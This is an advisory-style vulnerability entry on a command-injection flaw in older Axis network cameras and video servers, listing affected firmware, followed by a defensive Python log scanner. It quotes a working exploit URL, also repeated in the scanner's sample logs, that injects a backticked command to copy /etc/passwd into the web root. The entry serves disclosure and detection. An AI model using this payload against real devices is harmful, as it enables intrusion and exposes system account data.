Vendor: Axis Network Cameras and Video Servers
By:
CVSS: 7.5 (HIGH)
CWE: Shell Metacharacter Command-Execution
Product Name: Axis Network Cameras and Video Servers
Affected Version From: Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40, Axis 2130 network cameras, Axis 2401 and 2401 video servers
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: axis:2100_firmware:2.34, axis:2100_firmware:2.35, axis:2100_firmware:2.36, axis:2100_firmware:2.37, axis:2100_firmware:2.38, axis:2100_firmware:2.39, axis:2100_firmware:2.40, axis:2110_firmware:2.34, axis:2110_firmware:2.35, axis:2110_firmware:2.36, axis:2110_firmware:2.37, axis:2110_firmware:2.38, axis:2110_firmware:2.39, axis:2110_firmware:2.40, axis:2120_firmware:2.34, axis:2120_firmware:2.35, axis:2120_firmware:2.36, axis:2120_firmware:2.37, axis:2120_firmware:2.38, axis:2120_firmware:2.39, axis:2120_firmware:2.40, axis:2420_firmware:2.34, axis:2420_firmware:2.35, axis:2420_firmware:2.36, axis:2420_firmware:2.37, axis:2420_firmware:2.38, axis:2420_firmware:2.39, axis:2420_firmware:2.40, axis:2130, axis:2401, axis:2401_video_server
Metasploit:
Other Scripts:
Platforms Tested:

Shell Metacharacter Command-Execution Vulnerability in Axis Network Cameras and Video Servers

An anonymous user can exploit this vulnerability to download the contents of the '/etc/passwd' file on the device. Other commands can also be executed, enabling further attacks.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11011/info

1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks.

This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers


http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60
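
Added example (not part of the original advisory or of any Axis code): one way to search web or proxy access logs for requests of the kind shown above, i.e. shell metacharacters in the query string of a CGI under /axis-cgi/. The log format (common/combined), the sample lines and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Request line of a common/combined access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Some log writers render bytes as \xHH; fold those back before inspection.
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
# Characters a shell interprets. '&' is omitted: it separates query parameters.
SHELL_META_RE = re.compile(r'[`;|<>]|\$\(')

# Constructed sample log (documentation IP ranges; parameters a=1&b=2 are made up).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET /axis-cgi/io/virtualinput.cgi?a=1&b=2 HTTP/1.0" 200 12',
    r'198.51.100.7 - - [01/Jan/2005:10:00:05 +0000] "GET /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 HTTP/1.0" 200 0',
    r'198.51.100.7 - - [01/Jan/2005:10:00:09 +0000] "GET /axis-cgi/io/virtualinput.cgi?%2560constructed%2560 HTTP/1.0" 200 0',
    r'192.0.2.10 - - [01/Jan/2005:10:01:00 +0000] "GET /index.html?q=a;b HTTP/1.0" 200 512',
]


def normalize(target):
    """Undo \\xHH log escaping, then percent-decode twice to catch double encoding."""
    target = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), target)
    return unquote(unquote(target))


def suspicious_cgi_requests(lines, prefix="/axis-cgi/"):
    """Return (line_number, decoded_target) for CGI requests whose query
    string contains shell metacharacters after decoding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        decoded = normalize(match.group("target"))
        path, _, query = decoded.partition("?")
        if path.startswith(prefix) and SHELL_META_RE.search(query):
            hits.append((number, decoded))
    return hits


if __name__ == "__main__":
    for number, target in suspicious_cgi_requests(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

Decoding twice trades a few false positives for catching double-encoded requests; a hit is a lead to check against the device's web root for unexpected files, not proof of compromise.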